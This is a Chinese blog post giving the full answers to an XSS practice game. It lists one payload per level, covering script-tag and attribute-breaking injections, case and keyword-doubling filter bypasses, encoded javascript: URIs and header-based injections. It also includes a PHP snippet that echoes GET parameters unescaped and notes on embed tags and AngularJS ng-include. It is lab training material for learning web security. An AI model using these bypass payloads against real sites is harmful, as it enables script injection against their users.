zoukankan      html  css  js  c++  java

  • xss小游戏通关-全答案

    xss

    url:http://test.ctf8.com/level1.php?name=test

    小游戏payload:

    1. <script>alert("'test'")</script>
    2. "><script>alert("'test'")</script>
    3. ' onclick=alert("'test'") '
    4. " onclick=alert("'test'") "
    5. "><a href=javascript:alert("'test'")>test</a>
    6. "><scRipt>alert("'test'")</sCript>
    7. "><scriscriptpt>alert("'test'")</scriscriptpt>
    8. javasc&#x72;ipt:alert(1)
    9. javasc&#x72;ipt:alert(1)/* http://test*/
    10. ?keyword=123&t_link=123&t_history=123&t_sort=test" onclick=alert("'test'") type="text
    11. Referer: test" onclick=alert("'test'") type="text
    12. User-Agent:test" onclick=alert("'test'") type="text
    13. Cookie: user=test" onclick=alert("'test'") type="text
    14. 据说是一个图片中的exif信息,但是网址已失效;
    15. level15.php?src='level1.php?name=<img src=x onerror=alert(1)>'
    16. level16.php?keyword=<img%0asrc=x%0aonerror=alert("'test'")>
    17. level17.php?arg01=a&arg02= onmouseover=alert("'test'")
    18. level18.php?arg01= onmouseover=alert("'test'")&arg02=b
    19. flash xss
    20. flash xss

    有些参数可能会隐藏哦:

    源码:get.php

    <?php 
echo "<h2>php变量提交get参数:</h2>";
$str = $_GET["name"];
$str2 = $_GET["sex"];
echo "<h2>form表单提交get参数</h2>".'
<center>
<form id=form>
<p>姓名:</p><input name="name"  value="'.'" type="text">
<p>input通过php接收姓名参数:</p><input name="form"  value="'.$str.'" type="text">
<p>直接接收php性别参数</p><input name="form2"  value="'.$str2.'" type="text">
<input type="submit" value="提交"/>
</form>
</center>';
?>
    1. url中能看到的参数:?name=xiaoming&form=&form2=
    2. 没有在URL中显示参数:&sex=
    3. DOM不经过服务器的
    • 能显示在url中的参数中的是form表单中name属性定义的参数;php定义的需要手动添加,或者链接到form表单上;

    在线编码网站:http://monyer.com/demo/monyerjs/

    <embed>标签

    embed可以用来插入各种多媒体,格式可以是 Swf、Midi、Wav、AIFF、AU、MP3等等,Netscape及新版的IE 都支持。src为音频或视频文件及其路径,可以是相对路径或绝对路径。

    支持事件属性;

    弹窗方式:

    <embed src=level16.png onmouseover=alert(1) width=100% heigth=100%>

    <embed src=son.html onmouseover=alert(1) width=100% heigth=100%>

    AngularJS中的ng-include

    1. 是否是在服务器上运行的。(注意不是服务器上,直接打开HTML文件是不行的)
    2. 文件路径是否对,如果是同一文件夹中,这样写:(注意其中的“”中间还有个‘’)
    3. ng-controller="myCtrl"是不是正确,如果没有对应的controller
    4. 组件<script src="http://apps.bdimg.com/libs/angular.js/1.4.6/angular.min.js"></script>

    fath.html内容:

    <head>
        <meta charset="utf-8">
        <script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.2.0/angular.min.js"></script>
</head>
<body>
    <div ng-include="'son.html'"></div>
    <!-- 路径里面必须带上单引号 -->
    <!-- 注意:如果 ng-controller没有对应的方法,就不要写了,会报错-->
</body>

    son.html内容:

    Hello world

    数据一次完整的编码解码过程:
  • 相关阅读:
    解剖PetShop系列之六PetShop表示层设计
    解剖PetShop系列之五PetShop之业务逻辑层设计
    用memset给一个char设置0xff,然后将该char和0xff ==,能相等么?
    用gdb如何查看指定地址的内存内容?
    Open a pipe will block if other side hasn't opened this pipe
    inet_aton和inet_pton的区别
    很多源码中看到的ignore SIGCHLD信号是做什么用的?
    Linux下getopt函数使用Tips
    Linux下编译一个静态链接的程序的注意点
    Linux 脚本和程序对SIGINT的处理方案,脚本通过kill给程序传递信号
  • 原文地址:https://www.cnblogs.com/p0laris/p/12171689.html
Copyright © 2011-2022 走看看